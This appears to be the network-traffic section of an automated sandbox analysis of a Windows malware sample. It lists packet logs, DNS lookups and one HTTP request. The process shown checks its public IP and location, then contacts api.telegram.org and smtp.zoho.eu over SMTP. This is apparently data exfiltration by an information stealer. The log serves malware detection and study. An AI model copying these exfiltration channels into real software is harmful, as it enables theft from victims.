Aug 18, 2024 21:25:46.066560984 CEST	49762	443	192.168.2.4	188.114.97.3
Aug 18, 2024 21:25:46.067063093 CEST	49762	443	192.168.2.4	188.114.97.3
Aug 18, 2024 21:25:46.067074060 CEST	443	49762	188.114.97.3	192.168.2.4
Aug 18, 2024 21:25:46.107698917 CEST	49760	80	192.168.2.4	132.226.8.169
Aug 18, 2024 21:25:46.215481043 CEST	80	49761	132.226.8.169	192.168.2.4
Aug 18, 2024 21:25:46.216598034 CEST	49763	443	192.168.2.4	188.114.97.3
Aug 18, 2024 21:25:46.216634035 CEST	443	49763	188.114.97.3	192.168.2.4
Aug 18, 2024 21:25:46.216708899 CEST	49763	443	192.168.2.4	188.114.97.3
Aug 18, 2024 21:25:46.217011929 CEST	49763	443	192.168.2.4	188.114.97.3
Aug 18, 2024 21:25:46.217026949 CEST	443	49763	188.114.97.3	192.168.2.4
Aug 18, 2024 21:25:46.263935089 CEST	49761	80	192.168.2.4	132.226.8.169
Aug 18, 2024 21:25:46.768131971 CEST	443	49763	188.114.97.3	192.168.2.4
Aug 18, 2024 21:25:46.769634962 CEST	49763	443	192.168.2.4	188.114.97.3
Aug 18, 2024 21:25:46.769676924 CEST	443	49763	188.114.97.3	192.168.2.4
Aug 18, 2024 21:25:46.772182941 CEST	443	49762	188.114.97.3	192.168.2.4
Aug 18, 2024 21:25:46.773423910 CEST	49762	443	192.168.2.4	188.114.97.3
Aug 18, 2024 21:25:46.773477077 CEST	443	49762	188.114.97.3	192.168.2.4
Aug 18, 2024 21:25:46.902596951 CEST	443	49762	188.114.97.3	192.168.2.4
Aug 18, 2024 21:25:46.902816057 CEST	443	49762	188.114.97.3	192.168.2.4
Aug 18, 2024 21:25:46.902879000 CEST	49762	443	192.168.2.4	188.114.97.3
Aug 18, 2024 21:25:46.903708935 CEST	49762	443	192.168.2.4	188.114.97.3
Aug 18, 2024 21:25:46.914652109 CEST	443	49763	188.114.97.3	192.168.2.4
Aug 18, 2024 21:25:46.914720058 CEST	443	49763	188.114.97.3	192.168.2.4
Aug 18, 2024 21:25:46.914767981 CEST	49763	443	192.168.2.4	188.114.97.3
Aug 18, 2024 21:25:46.915234089 CEST	49763	443	192.168.2.4	188.114.97.3
Aug 18, 2024 21:25:46.921958923 CEST	49764	80	192.168.2.4	132.226.8.169
Aug 18, 2024 21:25:46.923544884 CEST	49760	80	192.168.2.4	132.226.8.169
Aug 18, 2024 21:25:46.928139925 CEST	80	49764	132.226.8.169	192.168.2.4
Aug 18, 2024 21:25:46.928214073 CEST	49764	80	192.168.2.4	132.226.8.169
Aug 18, 2024 21:25:46.928288937 CEST	49764	80	192.168.2.4	132.226.8.169
Aug 18, 2024 21:25:46.929435015 CEST	80	49760	132.226.8.169	192.168.2.4
Aug 18, 2024 21:25:46.929498911 CEST	49760	80	192.168.2.4	132.226.8.169
Aug 18, 2024 21:25:46.931600094 CEST	49765	443	192.168.2.4	149.154.167.220
Aug 18, 2024 21:25:46.931659937 CEST	443	49765	149.154.167.220	192.168.2.4
Aug 18, 2024 21:25:46.931716919 CEST	49765	443	192.168.2.4	149.154.167.220
Aug 18, 2024 21:25:46.932051897 CEST	49765	443	192.168.2.4	149.154.167.220
Aug 18, 2024 21:25:46.932068110 CEST	443	49765	149.154.167.220	192.168.2.4
Aug 18, 2024 21:25:46.933229923 CEST	80	49764	132.226.8.169	192.168.2.4
Aug 18, 2024 21:25:47.571868896 CEST	443	49765	149.154.167.220	192.168.2.4
Aug 18, 2024 21:25:47.572006941 CEST	49765	443	192.168.2.4	149.154.167.220
Aug 18, 2024 21:25:47.573782921 CEST	49765	443	192.168.2.4	149.154.167.220
Aug 18, 2024 21:25:47.573790073 CEST	443	49765	149.154.167.220	192.168.2.4
Aug 18, 2024 21:25:47.574178934 CEST	443	49765	149.154.167.220	192.168.2.4
Aug 18, 2024 21:25:47.575545073 CEST	49765	443	192.168.2.4	149.154.167.220
Aug 18, 2024 21:25:47.616508007 CEST	443	49765	149.154.167.220	192.168.2.4
Aug 18, 2024 21:25:47.812742949 CEST	443	49765	149.154.167.220	192.168.2.4
Aug 18, 2024 21:25:47.812901020 CEST	443	49765	149.154.167.220	192.168.2.4
Aug 18, 2024 21:25:47.812964916 CEST	49765	443	192.168.2.4	149.154.167.220
Aug 18, 2024 21:25:47.817264080 CEST	49765	443	192.168.2.4	149.154.167.220
Aug 18, 2024 21:25:48.704647064 CEST	80	49764	132.226.8.169	192.168.2.4
Aug 18, 2024 21:25:48.705868006 CEST	49766	443	192.168.2.4	188.114.97.3
Aug 18, 2024 21:25:48.705897093 CEST	443	49766	188.114.97.3	192.168.2.4
Aug 18, 2024 21:25:48.705966949 CEST	49766	443	192.168.2.4	188.114.97.3
Aug 18, 2024 21:25:48.706208944 CEST	49766	443	192.168.2.4	188.114.97.3
Aug 18, 2024 21:25:48.706218004 CEST	443	49766	188.114.97.3	192.168.2.4
Aug 18, 2024 21:25:48.748334885 CEST	49764	80	192.168.2.4	132.226.8.169
Aug 18, 2024 21:25:49.471446037 CEST	443	49766	188.114.97.3	192.168.2.4
Aug 18, 2024 21:25:49.473103046 CEST	49766	443	192.168.2.4	188.114.97.3
Aug 18, 2024 21:25:49.473119020 CEST	443	49766	188.114.97.3	192.168.2.4
Aug 18, 2024 21:25:49.603923082 CEST	443	49766	188.114.97.3	192.168.2.4
Aug 18, 2024 21:25:49.604202986 CEST	443	49766	188.114.97.3	192.168.2.4
Aug 18, 2024 21:25:49.604266882 CEST	49766	443	192.168.2.4	188.114.97.3
Aug 18, 2024 21:25:49.604526997 CEST	49766	443	192.168.2.4	188.114.97.3
Aug 18, 2024 21:25:49.607671976 CEST	49764	80	192.168.2.4	132.226.8.169
Aug 18, 2024 21:25:49.608807087 CEST	49767	80	192.168.2.4	132.226.8.169
Aug 18, 2024 21:25:49.613042116 CEST	80	49764	132.226.8.169	192.168.2.4
Aug 18, 2024 21:25:49.613114119 CEST	49764	80	192.168.2.4	132.226.8.169
Aug 18, 2024 21:25:49.613758087 CEST	80	49767	132.226.8.169	192.168.2.4
Aug 18, 2024 21:25:49.613823891 CEST	49767	80	192.168.2.4	132.226.8.169
Aug 18, 2024 21:25:49.613893986 CEST	49767	80	192.168.2.4	132.226.8.169
Aug 18, 2024 21:25:49.618724108 CEST	80	49767	132.226.8.169	192.168.2.4
Aug 18, 2024 21:25:50.388500929 CEST	80	49767	132.226.8.169	192.168.2.4
Aug 18, 2024 21:25:50.389736891 CEST	49768	443	192.168.2.4	188.114.97.3
Aug 18, 2024 21:25:50.389811993 CEST	443	49768	188.114.97.3	192.168.2.4
Aug 18, 2024 21:25:50.389913082 CEST	49768	443	192.168.2.4	188.114.97.3
Aug 18, 2024 21:25:50.390161991 CEST	49768	443	192.168.2.4	188.114.97.3
Aug 18, 2024 21:25:50.390193939 CEST	443	49768	188.114.97.3	192.168.2.4
Aug 18, 2024 21:25:50.435807943 CEST	49767	80	192.168.2.4	132.226.8.169
Aug 18, 2024 21:25:50.869000912 CEST	443	49768	188.114.97.3	192.168.2.4
Aug 18, 2024 21:25:50.870465994 CEST	49768	443	192.168.2.4	188.114.97.3
Aug 18, 2024 21:25:50.870520115 CEST	443	49768	188.114.97.3	192.168.2.4
Aug 18, 2024 21:25:51.016024113 CEST	443	49768	188.114.97.3	192.168.2.4
Aug 18, 2024 21:25:51.016236067 CEST	443	49768	188.114.97.3	192.168.2.4
Aug 18, 2024 21:25:51.016303062 CEST	49768	443	192.168.2.4	188.114.97.3
Aug 18, 2024 21:25:51.016649961 CEST	49768	443	192.168.2.4	188.114.97.3
Aug 18, 2024 21:25:51.020622969 CEST	49767	80	192.168.2.4	132.226.8.169
Aug 18, 2024 21:25:51.021223068 CEST	49769	80	192.168.2.4	132.226.8.169
Aug 18, 2024 21:25:51.025790930 CEST	80	49767	132.226.8.169	192.168.2.4
Aug 18, 2024 21:25:51.025871038 CEST	49767	80	192.168.2.4	132.226.8.169
Aug 18, 2024 21:25:51.026009083 CEST	80	49769	132.226.8.169	192.168.2.4
Aug 18, 2024 21:25:51.026073933 CEST	49769	80	192.168.2.4	132.226.8.169
Aug 18, 2024 21:25:51.026159048 CEST	49769	80	192.168.2.4	132.226.8.169
Aug 18, 2024 21:25:51.032490015 CEST	80	49769	132.226.8.169	192.168.2.4
Aug 18, 2024 21:25:51.811882019 CEST	80	49769	132.226.8.169	192.168.2.4
Aug 18, 2024 21:25:51.813134909 CEST	49770	443	192.168.2.4	188.114.97.3
Aug 18, 2024 21:25:51.813163042 CEST	443	49770	188.114.97.3	192.168.2.4
Aug 18, 2024 21:25:51.813241959 CEST	49770	443	192.168.2.4	188.114.97.3
Aug 18, 2024 21:25:51.813520908 CEST	49770	443	192.168.2.4	188.114.97.3
Aug 18, 2024 21:25:51.813532114 CEST	443	49770	188.114.97.3	192.168.2.4
Aug 18, 2024 21:25:51.857737064 CEST	49769	80	192.168.2.4	132.226.8.169
Aug 18, 2024 21:25:52.311990976 CEST	443	49770	188.114.97.3	192.168.2.4
Aug 18, 2024 21:25:52.313560963 CEST	49770	443	192.168.2.4	188.114.97.3
Aug 18, 2024 21:25:52.313575029 CEST	443	49770	188.114.97.3	192.168.2.4
Aug 18, 2024 21:25:52.465825081 CEST	443	49770	188.114.97.3	192.168.2.4
Aug 18, 2024 21:25:52.466049910 CEST	443	49770	188.114.97.3	192.168.2.4
Aug 18, 2024 21:25:52.466106892 CEST	49770	443	192.168.2.4	188.114.97.3
Aug 18, 2024 21:25:52.466438055 CEST	49770	443	192.168.2.4	188.114.97.3
Aug 18, 2024 21:25:52.469775915 CEST	49769	80	192.168.2.4	132.226.8.169
Aug 18, 2024 21:25:52.470930099 CEST	49771	80	192.168.2.4	132.226.8.169
Aug 18, 2024 21:25:52.475251913 CEST	80	49769	132.226.8.169	192.168.2.4
Aug 18, 2024 21:25:52.475332975 CEST	49769	80	192.168.2.4	132.226.8.169
Aug 18, 2024 21:25:52.475780010 CEST	80	49771	132.226.8.169	192.168.2.4
Aug 18, 2024 21:25:52.475847960 CEST	49771	80	192.168.2.4	132.226.8.169
Aug 18, 2024 21:25:52.475917101 CEST	49771	80	192.168.2.4	132.226.8.169
Aug 18, 2024 21:25:52.480725050 CEST	80	49771	132.226.8.169	192.168.2.4
Aug 18, 2024 21:25:53.043137074 CEST	49745	80	192.168.2.4	132.226.8.169
Aug 18, 2024 21:25:53.237845898 CEST	49772	587	192.168.2.4	185.230.212.164
Aug 18, 2024 21:25:53.242857933 CEST	587	49772	185.230.212.164	192.168.2.4
Aug 18, 2024 21:25:53.242923021 CEST	49772	587	192.168.2.4	185.230.212.164
Aug 18, 2024 21:25:53.271522045 CEST	80	49771	132.226.8.169	192.168.2.4
Aug 18, 2024 21:25:53.272547007 CEST	49773	443	192.168.2.4	188.114.97.3
Aug 18, 2024 21:25:53.272576094 CEST	443	49773	188.114.97.3	192.168.2.4
Aug 18, 2024 21:25:53.272911072 CEST	49773	443	192.168.2.4	188.114.97.3
Aug 18, 2024 21:25:53.272911072 CEST	49773	443	192.168.2.4	188.114.97.3
Aug 18, 2024 21:25:53.272944927 CEST	443	49773	188.114.97.3	192.168.2.4
Aug 18, 2024 21:25:53.326459885 CEST	49771	80	192.168.2.4	132.226.8.169
Aug 18, 2024 21:25:53.742213964 CEST	443	49773	188.114.97.3	192.168.2.4
Aug 18, 2024 21:25:53.744066000 CEST	49773	443	192.168.2.4	188.114.97.3
Aug 18, 2024 21:25:53.744116068 CEST	443	49773	188.114.97.3	192.168.2.4
Aug 18, 2024 21:25:53.825695038 CEST	587	49772	185.230.212.164	192.168.2.4
Aug 18, 2024 21:25:53.828296900 CEST	49772	587	192.168.2.4	185.230.212.164
Aug 18, 2024 21:25:53.833233118 CEST	587	49772	185.230.212.164	192.168.2.4
Aug 18, 2024 21:25:53.884907961 CEST	443	49773	188.114.97.3	192.168.2.4
Aug 18, 2024 21:25:53.885164022 CEST	443	49773	188.114.97.3	192.168.2.4
Aug 18, 2024 21:25:53.885256052 CEST	49773	443	192.168.2.4	188.114.97.3
Aug 18, 2024 21:25:53.885787964 CEST	49773	443	192.168.2.4	188.114.97.3
Aug 18, 2024 21:25:53.889137983 CEST	49771	80	192.168.2.4	132.226.8.169
Aug 18, 2024 21:25:53.890135050 CEST	49774	80	192.168.2.4	132.226.8.169
Aug 18, 2024 21:25:53.894344091 CEST	80	49771	132.226.8.169	192.168.2.4
Aug 18, 2024 21:25:53.894988060 CEST	80	49774	132.226.8.169	192.168.2.4
Aug 18, 2024 21:25:53.895044088 CEST	49771	80	192.168.2.4	132.226.8.169
Aug 18, 2024 21:25:53.895081043 CEST	49774	80	192.168.2.4	132.226.8.169
Aug 18, 2024 21:25:53.895152092 CEST	49774	80	192.168.2.4	132.226.8.169
Aug 18, 2024 21:25:53.899960041 CEST	80	49774	132.226.8.169	192.168.2.4
Aug 18, 2024 21:25:54.133965969 CEST	587	49772	185.230.212.164	192.168.2.4
Aug 18, 2024 21:25:54.136277914 CEST	49772	587	192.168.2.4	185.230.212.164
Aug 18, 2024 21:25:54.141206026 CEST	587	49772	185.230.212.164	192.168.2.4
Aug 18, 2024 21:25:54.314455986 CEST	587	49772	185.230.212.164	192.168.2.4
Aug 18, 2024 21:25:54.314877987 CEST	49772	587	192.168.2.4	185.230.212.164
Aug 18, 2024 21:25:54.319808006 CEST	587	49772	185.230.212.164	192.168.2.4
Aug 18, 2024 21:25:54.494745970 CEST	587	49772	185.230.212.164	192.168.2.4
Aug 18, 2024 21:25:54.494795084 CEST	587	49772	185.230.212.164	192.168.2.4
Aug 18, 2024 21:25:54.494852066 CEST	587	49772	185.230.212.164	192.168.2.4
Aug 18, 2024 21:25:54.494887114 CEST	587	49772	185.230.212.164	192.168.2.4
Aug 18, 2024 21:25:54.494903088 CEST	49772	587	192.168.2.4	185.230.212.164
Aug 18, 2024 21:25:54.494941950 CEST	49772	587	192.168.2.4	185.230.212.164
Aug 18, 2024 21:25:54.497049093 CEST	49772	587	192.168.2.4	185.230.212.164
Aug 18, 2024 21:25:54.505400896 CEST	587	49772	185.230.212.164	192.168.2.4
Aug 18, 2024 21:25:54.672028065 CEST	80	49774	132.226.8.169	192.168.2.4
Aug 18, 2024 21:25:54.673338890 CEST	49775	443	192.168.2.4	188.114.97.3
Aug 18, 2024 21:25:54.673368931 CEST	443	49775	188.114.97.3	192.168.2.4
Aug 18, 2024 21:25:54.673449993 CEST	49775	443	192.168.2.4	188.114.97.3
Aug 18, 2024 21:25:54.673723936 CEST	49775	443	192.168.2.4	188.114.97.3
Aug 18, 2024 21:25:54.673732996 CEST	443	49775	188.114.97.3	192.168.2.4
Aug 18, 2024 21:25:54.678713083 CEST	587	49772	185.230.212.164	192.168.2.4
Aug 18, 2024 21:25:54.681518078 CEST	49772	587	192.168.2.4	185.230.212.164
Aug 18, 2024 21:25:54.686789036 CEST	587	49772	185.230.212.164	192.168.2.4
Aug 18, 2024 21:25:54.717086077 CEST	49774	80	192.168.2.4	132.226.8.169
Aug 18, 2024 21:25:54.860136986 CEST	587	49772	185.230.212.164	192.168.2.4
Aug 18, 2024 21:25:54.861357927 CEST	49772	587	192.168.2.4	185.230.212.164
Aug 18, 2024 21:25:54.866280079 CEST	587	49772	185.230.212.164	192.168.2.4
Aug 18, 2024 21:25:55.039400101 CEST	587	49772	185.230.212.164	192.168.2.4
Aug 18, 2024 21:25:55.039647102 CEST	49772	587	192.168.2.4	185.230.212.164
Aug 18, 2024 21:25:55.045298100 CEST	587	49772	185.230.212.164	192.168.2.4
Aug 18, 2024 21:25:55.164288044 CEST	443	49775	188.114.97.3	192.168.2.4
Aug 18, 2024 21:25:55.165855885 CEST	49775	443	192.168.2.4	188.114.97.3
Aug 18, 2024 21:25:55.165870905 CEST	443	49775	188.114.97.3	192.168.2.4
Aug 18, 2024 21:25:55.257729053 CEST	587	49772	185.230.212.164	192.168.2.4
Aug 18, 2024 21:25:55.258091927 CEST	49772	587	192.168.2.4	185.230.212.164
Aug 18, 2024 21:25:55.262964010 CEST	587	49772	185.230.212.164	192.168.2.4
Aug 18, 2024 21:25:55.320318937 CEST	443	49775	188.114.97.3	192.168.2.4
Aug 18, 2024 21:25:55.320538044 CEST	443	49775	188.114.97.3	192.168.2.4
Aug 18, 2024 21:25:55.320605040 CEST	49775	443	192.168.2.4	188.114.97.3
Aug 18, 2024 21:25:55.320887089 CEST	49775	443	192.168.2.4	188.114.97.3
Aug 18, 2024 21:25:55.323621035 CEST	49774	80	192.168.2.4	132.226.8.169
Aug 18, 2024 21:25:55.324748993 CEST	49776	80	192.168.2.4	132.226.8.169
Aug 18, 2024 21:25:55.328866959 CEST	80	49774	132.226.8.169	192.168.2.4
Aug 18, 2024 21:25:55.328958035 CEST	49774	80	192.168.2.4	132.226.8.169
Aug 18, 2024 21:25:55.329715967 CEST	80	49776	132.226.8.169	192.168.2.4
Aug 18, 2024 21:25:55.329802990 CEST	49776	80	192.168.2.4	132.226.8.169
Aug 18, 2024 21:25:55.329905987 CEST	49776	80	192.168.2.4	132.226.8.169
Aug 18, 2024 21:25:55.334764957 CEST	80	49776	132.226.8.169	192.168.2.4
Aug 18, 2024 21:25:55.439194918 CEST	587	49772	185.230.212.164	192.168.2.4
Aug 18, 2024 21:25:55.439414024 CEST	49772	587	192.168.2.4	185.230.212.164
Aug 18, 2024 21:25:55.446350098 CEST	587	49772	185.230.212.164	192.168.2.4
Aug 18, 2024 21:25:55.617683887 CEST	587	49772	185.230.212.164	192.168.2.4
Aug 18, 2024 21:25:55.618033886 CEST	49772	587	192.168.2.4	185.230.212.164
Aug 18, 2024 21:25:55.622916937 CEST	587	49772	185.230.212.164	192.168.2.4
Aug 18, 2024 21:25:55.797177076 CEST	587	49772	185.230.212.164	192.168.2.4
Aug 18, 2024 21:25:55.797818899 CEST	49772	587	192.168.2.4	185.230.212.164
Aug 18, 2024 21:25:55.797908068 CEST	49772	587	192.168.2.4	185.230.212.164
Aug 18, 2024 21:25:55.798130035 CEST	49772	587	192.168.2.4	185.230.212.164
Aug 18, 2024 21:25:55.798187971 CEST	49772	587	192.168.2.4	185.230.212.164
Aug 18, 2024 21:25:55.798207045 CEST	49772	587	192.168.2.4	185.230.212.164
Aug 18, 2024 21:25:55.802710056 CEST	587	49772	185.230.212.164	192.168.2.4
Aug 18, 2024 21:25:55.802762032 CEST	587	49772	185.230.212.164	192.168.2.4
Aug 18, 2024 21:25:55.803119898 CEST	587	49772	185.230.212.164	192.168.2.4
Aug 18, 2024 21:25:55.803147078 CEST	587	49772	185.230.212.164	192.168.2.4
Aug 18, 2024 21:25:55.803179026 CEST	587	49772	185.230.212.164	192.168.2.4
Aug 18, 2024 21:25:55.803303957 CEST	587	49772	185.230.212.164	192.168.2.4
Aug 18, 2024 21:25:55.803330898 CEST	587	49772	185.230.212.164	192.168.2.4
Aug 18, 2024 21:25:55.803400040 CEST	587	49772	185.230.212.164	192.168.2.4
Aug 18, 2024 21:25:55.803426981 CEST	587	49772	185.230.212.164	192.168.2.4
Aug 18, 2024 21:25:55.803455114 CEST	587	49772	185.230.212.164	192.168.2.4
Aug 18, 2024 21:25:56.138439894 CEST	80	49776	132.226.8.169	192.168.2.4
Aug 18, 2024 21:25:56.140101910 CEST	49777	443	192.168.2.4	188.114.97.3
Aug 18, 2024 21:25:56.140168905 CEST	443	49777	188.114.97.3	192.168.2.4
Aug 18, 2024 21:25:56.140538931 CEST	49777	443	192.168.2.4	188.114.97.3
Aug 18, 2024 21:25:56.140538931 CEST	49777	443	192.168.2.4	188.114.97.3
Aug 18, 2024 21:25:56.140619993 CEST	443	49777	188.114.97.3	192.168.2.4
Aug 18, 2024 21:25:56.154948950 CEST	587	49772	185.230.212.164	192.168.2.4
Aug 18, 2024 21:25:56.185935020 CEST	49776	80	192.168.2.4	132.226.8.169
Aug 18, 2024 21:25:56.201471090 CEST	49772	587	192.168.2.4	185.230.212.164
Aug 18, 2024 21:25:56.613725901 CEST	443	49777	188.114.97.3	192.168.2.4
Aug 18, 2024 21:25:56.615252972 CEST	49777	443	192.168.2.4	188.114.97.3
Aug 18, 2024 21:25:56.615309000 CEST	443	49777	188.114.97.3	192.168.2.4
Aug 18, 2024 21:25:56.761228085 CEST	443	49777	188.114.97.3	192.168.2.4
Aug 18, 2024 21:25:56.762038946 CEST	443	49777	188.114.97.3	192.168.2.4
Aug 18, 2024 21:25:56.762125969 CEST	49777	443	192.168.2.4	188.114.97.3
Aug 18, 2024 21:25:56.762387991 CEST	49777	443	192.168.2.4	188.114.97.3
Aug 18, 2024 21:25:56.771760941 CEST	49776	80	192.168.2.4	132.226.8.169
Aug 18, 2024 21:25:56.772510052 CEST	49778	443	192.168.2.4	149.154.167.220
Aug 18, 2024 21:25:56.772552013 CEST	443	49778	149.154.167.220	192.168.2.4
Aug 18, 2024 21:25:56.772633076 CEST	49778	443	192.168.2.4	149.154.167.220
Aug 18, 2024 21:25:56.772953987 CEST	49778	443	192.168.2.4	149.154.167.220
Aug 18, 2024 21:25:56.772969961 CEST	443	49778	149.154.167.220	192.168.2.4
Aug 18, 2024 21:25:56.777004957 CEST	80	49776	132.226.8.169	192.168.2.4
Aug 18, 2024 21:25:56.777071953 CEST	49776	80	192.168.2.4	132.226.8.169
Aug 18, 2024 21:25:57.922089100 CEST	443	49778	149.154.167.220	192.168.2.4
Aug 18, 2024 21:25:57.922209024 CEST	49778	443	192.168.2.4	149.154.167.220
Aug 18, 2024 21:25:57.928572893 CEST	49778	443	192.168.2.4	149.154.167.220
Aug 18, 2024 21:25:57.928584099 CEST	443	49778	149.154.167.220	192.168.2.4
Aug 18, 2024 21:25:57.928976059 CEST	443	49778	149.154.167.220	192.168.2.4
Aug 18, 2024 21:25:57.930504084 CEST	49778	443	192.168.2.4	149.154.167.220
Aug 18, 2024 21:25:57.972536087 CEST	443	49778	149.154.167.220	192.168.2.4
Aug 18, 2024 21:25:58.169958115 CEST	443	49778	149.154.167.220	192.168.2.4
Aug 18, 2024 21:25:58.170101881 CEST	443	49778	149.154.167.220	192.168.2.4
Aug 18, 2024 21:25:58.170192003 CEST	49778	443	192.168.2.4	149.154.167.220
Aug 18, 2024 21:25:58.172235966 CEST	49778	443	192.168.2.4	149.154.167.220
Aug 18, 2024 21:26:03.372737885 CEST	49761	80	192.168.2.4	132.226.8.169
Aug 18, 2024 21:26:03.505722046 CEST	49779	587	192.168.2.4	185.230.212.164
Aug 18, 2024 21:26:03.510718107 CEST	587	49779	185.230.212.164	192.168.2.4
Aug 18, 2024 21:26:03.510804892 CEST	49779	587	192.168.2.4	185.230.212.164
Aug 18, 2024 21:26:04.115439892 CEST	587	49779	185.230.212.164	192.168.2.4
Aug 18, 2024 21:26:04.170213938 CEST	49779	587	192.168.2.4	185.230.212.164
Aug 18, 2024 21:26:07.037107944 CEST	49779	587	192.168.2.4	185.230.212.164
Aug 18, 2024 21:26:07.042211056 CEST	587	49779	185.230.212.164	192.168.2.4
Aug 18, 2024 21:26:07.220210075 CEST	587	49779	185.230.212.164	192.168.2.4
Aug 18, 2024 21:26:07.220357895 CEST	49779	587	192.168.2.4	185.230.212.164
Aug 18, 2024 21:26:07.225373983 CEST	587	49779	185.230.212.164	192.168.2.4
Aug 18, 2024 21:26:07.401110888 CEST	587	49779	185.230.212.164	192.168.2.4
Aug 18, 2024 21:26:07.401489019 CEST	49779	587	192.168.2.4	185.230.212.164
Aug 18, 2024 21:26:07.406434059 CEST	587	49779	185.230.212.164	192.168.2.4
Aug 18, 2024 21:26:07.582807064 CEST	587	49779	185.230.212.164	192.168.2.4
Aug 18, 2024 21:26:07.582866907 CEST	587	49779	185.230.212.164	192.168.2.4
Aug 18, 2024 21:26:07.582904100 CEST	587	49779	185.230.212.164	192.168.2.4
Aug 18, 2024 21:26:07.582972050 CEST	49779	587	192.168.2.4	185.230.212.164
Aug 18, 2024 21:26:07.584198952 CEST	49779	587	192.168.2.4	185.230.212.164
Aug 18, 2024 21:26:07.589006901 CEST	587	49779	185.230.212.164	192.168.2.4
Aug 18, 2024 21:26:07.764550924 CEST	587	49779	185.230.212.164	192.168.2.4
Aug 18, 2024 21:26:07.766141891 CEST	49779	587	192.168.2.4	185.230.212.164
Aug 18, 2024 21:26:07.771126986 CEST	587	49779	185.230.212.164	192.168.2.4
Aug 18, 2024 21:26:07.946815968 CEST	587	49779	185.230.212.164	192.168.2.4
Aug 18, 2024 21:26:07.998338938 CEST	49779	587	192.168.2.4	185.230.212.164

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 18, 2024 21:25:26.137094975 CEST	57399	53	192.168.2.4	1.1.1.1
Aug 18, 2024 21:25:26.144280910 CEST	53	57399	1.1.1.1	192.168.2.4
Aug 18, 2024 21:25:29.934819937 CEST	49463	53	192.168.2.4	1.1.1.1
Aug 18, 2024 21:25:29.944499016 CEST	53	49463	1.1.1.1	192.168.2.4
Aug 18, 2024 21:25:41.441252947 CEST	57094	53	192.168.2.4	1.1.1.1
Aug 18, 2024 21:25:41.450182915 CEST	53	57094	1.1.1.1	192.168.2.4
Aug 18, 2024 21:25:46.924053907 CEST	56031	53	192.168.2.4	1.1.1.1
Aug 18, 2024 21:25:46.931158066 CEST	53	56031	1.1.1.1	192.168.2.4
Aug 18, 2024 21:25:53.202295065 CEST	50855	53	192.168.2.4	1.1.1.1
Aug 18, 2024 21:25:53.237298012 CEST	53	50855	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Aug 18, 2024 21:25:26.137094975 CEST	192.168.2.4	1.1.1.1	0xe1d3	Standard query (0)	checkip.dyndns.org	A (IP address)	IN (0x0001)	false
Aug 18, 2024 21:25:29.934819937 CEST	192.168.2.4	1.1.1.1	0x7c25	Standard query (0)	reallyfreegeoip.org	A (IP address)	IN (0x0001)	false
Aug 18, 2024 21:25:41.441252947 CEST	192.168.2.4	1.1.1.1	0x5150	Standard query (0)	reallyfreegeoip.org	A (IP address)	IN (0x0001)	false
Aug 18, 2024 21:25:46.924053907 CEST	192.168.2.4	1.1.1.1	0xdab5	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)	false
Aug 18, 2024 21:25:53.202295065 CEST	192.168.2.4	1.1.1.1	0x919	Standard query (0)	smtp.zoho.eu	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Aug 18, 2024 21:25:26.144280910 CEST	1.1.1.1	192.168.2.4	0xe1d3	No error (0)	checkip.dyndns.org	checkip.dyndns.com		CNAME (Canonical name)	IN (0x0001)	false
Aug 18, 2024 21:25:26.144280910 CEST	1.1.1.1	192.168.2.4	0xe1d3	No error (0)	checkip.dyndns.com		132.226.8.169	A (IP address)	IN (0x0001)	false
Aug 18, 2024 21:25:26.144280910 CEST	1.1.1.1	192.168.2.4	0xe1d3	No error (0)	checkip.dyndns.com		158.101.44.242	A (IP address)	IN (0x0001)	false
Aug 18, 2024 21:25:26.144280910 CEST	1.1.1.1	192.168.2.4	0xe1d3	No error (0)	checkip.dyndns.com		193.122.6.168	A (IP address)	IN (0x0001)	false
Aug 18, 2024 21:25:26.144280910 CEST	1.1.1.1	192.168.2.4	0xe1d3	No error (0)	checkip.dyndns.com		193.122.130.0	A (IP address)	IN (0x0001)	false
Aug 18, 2024 21:25:26.144280910 CEST	1.1.1.1	192.168.2.4	0xe1d3	No error (0)	checkip.dyndns.com		132.226.247.73	A (IP address)	IN (0x0001)	false
Aug 18, 2024 21:25:29.944499016 CEST	1.1.1.1	192.168.2.4	0x7c25	No error (0)	reallyfreegeoip.org		188.114.96.3	A (IP address)	IN (0x0001)	false
Aug 18, 2024 21:25:29.944499016 CEST	1.1.1.1	192.168.2.4	0x7c25	No error (0)	reallyfreegeoip.org		188.114.97.3	A (IP address)	IN (0x0001)	false
Aug 18, 2024 21:25:41.450182915 CEST	1.1.1.1	192.168.2.4	0x5150	No error (0)	reallyfreegeoip.org		188.114.97.3	A (IP address)	IN (0x0001)	false
Aug 18, 2024 21:25:41.450182915 CEST	1.1.1.1	192.168.2.4	0x5150	No error (0)	reallyfreegeoip.org		188.114.96.3	A (IP address)	IN (0x0001)	false
Aug 18, 2024 21:25:46.931158066 CEST	1.1.1.1	192.168.2.4	0xdab5	No error (0)	api.telegram.org		149.154.167.220	A (IP address)	IN (0x0001)	false
Aug 18, 2024 21:25:53.237298012 CEST	1.1.1.1	192.168.2.4	0x919	No error (0)	smtp.zoho.eu		185.230.212.164	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

reallyfreegeoip.org

api.telegram.org

checkip.dyndns.org

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49742	132.226.8.169	80	6936	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Timestamp	Bytes transferred	Direction	Data
Aug 18, 2024 21:25:26.178618908 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
